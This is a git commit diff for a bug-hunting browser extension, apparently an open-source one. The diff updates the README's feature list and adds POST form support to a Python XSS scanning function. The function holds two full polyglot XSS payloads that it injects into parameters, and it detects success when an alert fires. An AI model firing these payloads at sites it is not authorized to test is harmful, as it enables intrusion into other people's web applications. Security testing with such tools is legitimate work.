POST Scan XSS
parent
43e7eb8f06
commit
84ffc771a5
28
README.md
28
README.md
|
@ -8,6 +8,18 @@ Currently it scans for:
|
|||
- Local File Inclusion
|
||||
- Remote Commands Execution
|
||||
|
||||
All the features are:
|
||||
- Detect if the server is up
|
||||
- Start/Stop button
|
||||
- New XSS vectors, work in different contexts (JS var, JS function, inside HTML tag, outside HTML tag)
|
||||
- Basic page to list the vulnerabilities URL and TYPE
|
||||
- Time based SQLi scanner using polyglot vectors (MySQL, SQLite, Oracle, Postgresql, SQL Server)
|
||||
- RCE scanner using polyglot vectors based on time
|
||||
- New logo for the extension
|
||||
- Re-use your cookies and user-agent to get access to page with cookie-authentication
|
||||
- Export vulnerabilities into a CSV file
|
||||
- Launch scan when a form is submitted or a page is opened via the URL bar
|
||||
|
||||
**Warnings :** Do not use this extension for illegal purpose, the main goal of it is to simplify the life of bug hunters. It's a **BETA version**, many improvements will come don't worry
|
||||
|
||||
## Install
|
||||
|
@ -36,22 +48,6 @@ var config_server = "http://127.0.0.1:8000";
|
|||
4 - Browse the internet ! (Don't forget to start the extension by clicking the 'START' button)
|
||||
You can try the Error SQL, Blind SQL, LFI with Damn Vulnerable Web App
|
||||
|
||||
## New features
|
||||
- Detect if the server is up
|
||||
- Start/Stop button
|
||||
- New XSS vectors, work in different contexts (JS var, JS function, inside HTML tag, outside HTML tag)
|
||||
- Basic page to list the vulnerabilities URL and TYPE
|
||||
- Time based SQLi scanner using polyglot vectors (MySQL, SQLite, Oracle, Postgresql, SQL Server)
|
||||
- RCE scanner using polyglot vectors based on time
|
||||
- New logo for the extension
|
||||
- Re-use your cookies and user-agent to get access to page with cookie-authentication
|
||||
- Export vulnerabilities into a CSV file
|
||||
- Launch scan when a form is submitted or a page is opened via the URL bar
|
||||
|
||||
## TODO - Work in progress
|
||||
- Should detect target in source code.. (list of targets, then launch scan)
|
||||
- Do xss for POST with data dict
|
||||
|
||||
## Thanks
|
||||
- Polyglot vector for SQL injections [The Ultimate SQL Injection Payload](https://labs.detectify.com/2013/05/29/the-ultimate-sql-injection-payload/)
|
||||
- Polyglot vector for XSS injection 1 [One vector to rule them all](http://www.thespanner.co.uk/2010/09/15/one-vector-to-rule-them-all/)
|
||||
|
|
|
@ -6,22 +6,34 @@ import requests
|
|||
import datetime
|
||||
import re
|
||||
|
||||
"""scan_xss /!\ TODO : POST request (check method, data)
|
||||
"""scan_xss
|
||||
Description: inject a polyglot vector for XSS in every parameter, then it checks if an alert was triggered
|
||||
Parameters: vulns - list of vulnerabilities, url - address of the target, fuzz - parameter we modify
|
||||
"""
|
||||
def scan_xss(method, vulns, url, fuzz, cookie, useragent, firefox, data):
|
||||
payload = 'jaVasCript:alert(1)//" name=alert(1) onErrOr=eval(name) src=1 autofocus oNfoCus=eval(name)><marquee><img src=x onerror=alert(1)></marquee>" ></textarea\></|\><details/open/ontoggle=prompt`1` ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>\'-->" ></script><sCrIpt>confirm(1)</scRipt>"><img/id="confirm( 1)"/alt="/"src="/"onerror=eval(id&%23x29;>\'"><!--'
|
||||
payload1 = 'javascript:/*-->]]>%>?></script></title></textarea></noscript></style></xmp>">[img=1,name=/alert(1)/.source]<img -/style=a:expression(/*\'/-/*',/**/eval(name)/*%2A///*///);width:100%;height:100%;position:absolute;-ms-behavior:url(#default#time2) name=alert(1) onerror=eval(name) src=1 autofocus onfocus=eval(name) onclick=eval(name) onmouseover=eval(name) onbegin=eval(name) background=javascript:eval(name)//>"'
|
||||
|
||||
print repr(fuzz),"fuzz"
|
||||
try:
|
||||
with firefox.start() as session:
|
||||
|
||||
# Send GET XSS
|
||||
# POST
|
||||
if (method == 'POST' and fuzz != ''):
|
||||
inject = dict(data)
|
||||
inject[fuzz] = inject[fuzz] + payload
|
||||
del inject['']
|
||||
page, extra_resources = session.open(url, headers={'Cookie':cookie}, user_agent=useragent)
|
||||
result, resources = session.fill("form", inject)
|
||||
page, resources = session.call("form", "submit", expect_loading=True)
|
||||
result, resources = session.wait_for_alert(1)
|
||||
inject = url + ":" + fuzz + ":" + inject[fuzz]
|
||||
|
||||
# GET
|
||||
if (method == 'GET'):
|
||||
inject = url.replace(fuzz+"=", fuzz+"="+payload)
|
||||
page, extra_resources = session.open(inject, headers={'Cookie':cookie}, user_agent=useragent)
|
||||
result, resources = session.wait_for_alert(1)
|
||||
|
||||
|
||||
# Detect XSS result with an alert
|
||||
if result == '1':
|
||||
print "\t\t\033[93mXSS Detected \033[0m for ", fuzz, " with the payload :", payload
|
||||
|
@ -31,6 +43,12 @@ def scan_xss(method, vulns, url, fuzz, cookie, useragent, firefox, data):
|
|||
print "\t\t\033[94mXSS Failed \033[0m for ", fuzz, " with the payload :", payload
|
||||
|
||||
except Exception, e:
|
||||
if "alert" in str(e):
|
||||
print "\t\t\033[93mXSS Detected \033[0m for ", fuzz, " with the payload :", payload
|
||||
inject = url + ":" + fuzz + ":" + payload
|
||||
vulns['xss'] += 1
|
||||
vulns['list'] += 'XSS|TYPE|'+inject+'|DELIMITER|'
|
||||
else:
|
||||
print "\t\t\033[94mXSS Failed \033[0m for ", fuzz, " with the payload :", payload
|
||||
|
||||
|
||||
|
|
Loading…
Reference in New Issue